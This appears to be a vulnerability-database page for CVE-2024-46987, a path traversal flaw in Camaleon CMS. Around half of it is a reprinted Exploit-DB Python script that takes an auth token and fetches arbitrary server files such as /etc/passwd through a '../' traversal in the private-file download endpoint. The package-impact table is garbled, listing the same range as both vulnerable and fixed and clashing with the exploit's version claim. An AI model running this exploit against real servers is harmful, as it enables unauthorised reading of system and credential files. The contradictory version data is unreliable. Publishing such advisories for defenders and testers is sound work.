CVE-2024-46987
unknown
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
1.0
Description
Camaleon CMS vulnerable to arbitrary path traversal (GHSL-2024-183)
Predictions
Exploit likelihood
65%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Camaleon CMS v2.9.0 - Path Traversal
# Exploit Title: Camaleon CMS v2.9.0 - Path Traversal
# Date: 2026-02-02
# Exploit Author: Sakshi Velampudi (CyberQuestor)
# Vendor Homepage: https://github.com/owen2345/camaleon-cms
# Software Link: https://github.com/owen2345/camaleon-cms/releases/tag/2.9.0
# Version: <= 2.9.0
# Tested on: Linux
# CVE: CVE-2024-46987
# Authentication: Required (auth_token cookie)
# --------------------------------------------------
# Description
# Sends a single HTTP GET request to a vulnerable private file download endpoint
# Uses an auth_token cookie required for admin access
# Detects invalid authentication via redirect to /admin/login
# Displays a preview of the response when file retrieval succeeds
# Usage:
# Run only against systems explicitly authorized for testing
# --------------------------------------------------
"""
Camaleon CMS v2.9.0 - Path Traversal Proof of Concept
"""
import requests
print("\nCamaleon CMS v2.9.0 - Path Traversal PoC (authorized testing only)\n")
# --------------------------------------------------
# 1) Input Collection
# --------------------------------------------------
target_url = input("Target base URL (example: http://target.com): ").strip()
requested_path = input("File path to request (example: /etc/passwd): ").strip()
token = input("auth_token value: ").strip()
if not target_url or not requested_path or not token:
print("\n[!] Error: URL, file path, and auth_token are required.\n")
raise SystemExit(1)
# Normalize base URL to avoid malformed paths
target_url = target_url.rstrip("/")
# --------------------------------------------------
# 2) Request Construction
# --------------------------------------------------
url = (
f"{target_url}"
f"/admin/media/download_private_file"
f"?file=../../../../../../{requested_path.lstrip('/')}"
)
cookies = {"auth_token": token}
# --------------------------------------------------
# 3) Request Execution
# --------------------------------------------------
# Redirects are disabled to capture authentication failures.
try:
response = requests.get(url, cookies=cookies, timeout=10, allow_redirects=False)
except requests.exceptions.RequestException as e:
print(f"\n[!] Request error: {e}\n")
raise SystemExit(2)
# --------------------------------------------------
# 4) Response Handling
# --------------------------------------------------
print(f"\n[+] HTTP Status: {response.status_code}")
# Invalid authentication typically results in a redirect to the admin login page
if response.status_code == 302:
location = response.headers.get("Location", "")
if "/admin/login" in location:
print(f"[!] auth_token may be incorrect or expired (redirected to {location}).")
else:
print(f"[!] Redirected to: {location or '(no Location header)'}")
raise SystemExit(1)
# Successful response
if response.status_code == 200:
print("\n[+] Response preview:\n")
preview = response.text[:3000]
print(preview)
if len(response.text) > 3000:
print("\n...output truncated...")
raise SystemExit(0)
# Other failure conditions
print("\n[!] Request failed.")
if response.status_code == 500:
print("[!] The file path may be invalid, or the server encountered an internal error.")
print(f"[i] Response length: {len(response.content)} bytes")
raise SystemExit(1)Metasploit modules
Source fetch failed: fetch_error โ view the original via the link above.
Package impact
| Ecosystem | Package | Vulnerable | Fixed |
|---|---|---|---|
| RubyGems | camaleon_cms | <>= 2.8.1 | >= 2.8.1 |
| RubyGems | camaleon_cms | <2.8.1 | 2.8.1 |
References
- https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-cp65-5m9r-vc2c
- https://nvd.nist.gov/vuln/detail/CVE-2024-46987
- https://github.com/owen2345/camaleon-cms/commit/071b1b09d6d61ab02a5960b1ccafd9d9c2155a3e
- https://codeql.github.com/codeql-query-help/ruby/rb-path-injection
- https://github.com/owen2345/camaleon-cms
- https://github.com/rubysec/ruby-advisory-db/blob/master/gems/camaleon_cms/CVE-2024-46987.yml
- https://owasp.org/www-community/attacks/Path_Traversal
- https://securitylab.github.com/advisories/GHSL-2024-182_GHSL-2024-186_Camaleon_CMS
- https://www.reddit.com/r/rails/comments/1exwtdm/camaleon_cms_281_has_been_released
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.